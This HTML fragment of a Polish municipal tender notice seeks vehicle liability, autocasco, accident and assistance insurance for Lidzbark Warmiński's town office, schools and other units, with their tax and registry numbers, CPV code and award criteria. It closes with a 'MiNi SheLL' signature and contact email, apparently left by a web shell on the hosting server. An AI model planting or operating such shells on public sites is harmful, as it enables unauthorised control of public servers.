2. Miejski Zespół Ekonomiczno - Administracyjny Szkół i Przedszkoli, ul. Poniatowskiego 22, Lidzbark Warmiński,  NIP: 7431020904, REGON: 510360175,

3. Ośrodek Sportu i Rekreacji, ul. Bartoszycka 24, Lidzbark Warmiński, NIP: 7431692779, REGON: 000331240,

4. Miejska Biblioteka Publiczna, ul. Ratuszowa 4, Lidzbark Warmiński, NIP: 7431029940, REGON: 001323745,

5.Lidzbarski Dom Kultury, ul. Słowackiego 4, Lidzbark Warmiński,  NIP: 7431312535, REGON: 000791303,

6. Przedszkole Miejskie nr 5, ul. Wodna 9, Lidzbark Warmiński, NIP: 7431799661, REGON: 170973110,

7. Szkoła Podstawowa nr 1, ul. Szkolna 2, Lidzbark Warmiński,  NIP: 7431771757, REGON: 007013141,

8. Szkoła Podstawowa nr 3, ul. Lipowa 17a, Lidzbark Warmiński, NIP: 7431771728, REGON: 007008476,

9. Gimnazjum nr 1, ul. Szkolna 2a,  Lidzbark Warmiński,  NIP: 7431771763, REGON: 170769668, 

10. Gimnazjum nr 2, ul. Polna 36, Lidzbark Warmiński ,  NIP: 743171740, REGON: 170769674 ,

11. Zespół Szkolno - Przedszkolny, ul. Polna 36, 11-100 Lidzbark Warmiński,  NIP: 7431949178, REGON: 510526032,

11. Zespół Szkolno - Przedszkolny, ul. Polna 36, Lidzbark Warmiński,  NIP: 7431949178, REGON: 510045829,

12. Miejski Ośrodek Pomocy Społecznej, ul. Góreckiego 7, Lidzbark Warmiński,  NIP: 7431076744, REGON: 004445093.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80.00</li>
<li>2. Zaakceptowanie klauzul dodatkowych - 20.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II zamówienia -  ubezpieczenie mienia i odpowiedzialności Gminy Miejskiej Lidzbark
    Warmiński i jej jednostek organizacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia:
- ubezpieczenia odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych,
- ubezpieczenie autocasco,
- ubezpieczenia NNW kierowcy i pasażerów,
- ubezpieczenia assistance,

w następujących jednostkach organizacyjnych:1. Gmina Miejska Lidzbark Warmiński, ul. Świętochowskiego  14, Lidzbark Warmiński, NIP: 7431975709, REGON: 510743500,

2. Miejski Zespół Ekonomiczno - Administracyjny Szkół i Przedszkoli, ul. Poniatowskiego 22, Lidzbark Warmiński,  NIP: 7431020904, REGON: 510360175,

3. Ośrodek Sportu i Rekreacji, ul. Bartoszycka 24, Lidzbark Warmiński, NIP: 7431692779, REGON: 000331240,

4. Miejska Biblioteka Publiczna, ul. Ratuszowa 4, Lidzbark Warmiński, NIP: 7431029940, REGON: 001323745,

5.Lidzbarski Dom Kultury, ul. Słowackiego 4, Lidzbark Warmiński,  NIP: 7431312535, REGON: 000791303,

6. Przedszkole Miejskie nr 5, ul. Wodna 9, Lidzbark Warmiński, NIP: 7431799661, REGON: 170973110,

7. Szkoła Podstawowa nr 1, ul. Szkolna 2, Lidzbark Warmiński,  NIP: 7431771757, REGON: 007013141,

8. Szkoła Podstawowa nr 3, ul. Lipowa 17a, Lidzbark Warmiński, NIP: 7431771728, REGON: 007008476,

9. Gimnazjum nr 1, ul. Szkolna 2a,  Lidzbark Warmiński,  NIP: 7431771763, REGON: 170769668, 

10. Gimnazjum nr 2, ul. Polna 36, Lidzbark Warmiński ,  NIP: 743171740, REGON: 170769674 ,

11. Zespół Szkolno - Przedszkolny, ul. Polna 36, 11-100 Lidzbark Warmiński,  NIP: 7431949178, REGON: 510526032,

11. Zespół Szkolno - Przedszkolny, ul. Polna 36, Lidzbark Warmiński,  NIP: 7431949178, REGON: 510045829,

12. Miejski Ośrodek Pomocy Społecznej, ul. Góreckiego 7, Lidzbark Warmiński,  NIP: 7431076744, REGON: 004445093.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80.00</li>
<li>2. Zaakceptowanie klauzul dodatkowych - 20.00</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com